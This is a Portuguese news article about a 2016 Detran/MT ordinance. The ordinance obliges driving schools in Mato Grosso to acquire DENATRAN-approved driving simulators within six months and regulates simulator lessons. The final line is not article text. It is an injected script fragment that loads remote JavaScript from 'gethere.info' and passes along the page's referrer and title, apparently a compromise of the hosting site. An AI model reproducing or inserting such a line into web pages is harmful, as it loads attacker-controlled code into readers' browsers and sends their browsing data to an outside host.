O presidente do Departamento Estadual de Trânsito de MT (Detran/MT), Rogers Elizandro Jarbas, baixou a portaria nº 016/2016 que prevê mudanças na formação de condutores da categoria ‘B’ em Mato Grosso.
De acordo com a portaria, os donos de autoescolas do Estado têm 180 dias (seis meses) para adquirir os simuladores de direção.
O polêmico equipamento deve aumentar o custo da habilitação em Mato Grosso em até 30%.
Segundo informações da portaria, “os Centros de Formação de Condutores deverão, obrigatoriamente, utilizar simuladores de direção veicular fabricados ou comercializados por empresas homologadas pelo DENATRAN e cadastrados pela Coordenadoria de Controle de Formação de Condutores do DETRAN-MT”, diz trecho do documento.
Ainda de acordo com a portaria, “serão consideradas nulas as aulas em simulador de direção veicular ministradas em equipamentos fornecidos por empresas não homologadas e não cadastradas nos termos do “caput” deste artigo, sem prejuízo da apuração das responsabilidades dos CFC envolvidos e de seu respectivo corpo diretivo e técnico”.
As aulas realizadas em simuladores de direção veicular, ministradas em qualquer horário após a conclusão das aulas teóricas e limitadas a 50 (cinquenta) minutos cada, serão distribuídas da seguinte forma e ordem:
- a) Preparação para que o aluno(s) receba(m) orientações gerais e conceitos que serão abordados durante a aula;
- b) Realização da aula no simulador de direção veicular, fixado em 30 (trinta) minutos, reproduzindo cenários que atendam o conteúdo didático-pedagógico estabelecido em Resolução.
- 1º O Instrutor, o Diretor de Ensino ou o Diretor Geral do Centro de Formação de Condutores realizará a supervisão do aluno durante as aulas ministradas no simulador de direção veicular, prestando-lhe todos os esclarecimentos solicitados, sendo permitida a supervisão simultânea de no máximo 03 (três) alunos, desde que no interior de um único ambiente.
- 2º Poderão ser realizadas até 03 (três) aulas no simulador de direção veicular, em um mesmo dia, simultaneamente ou não.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;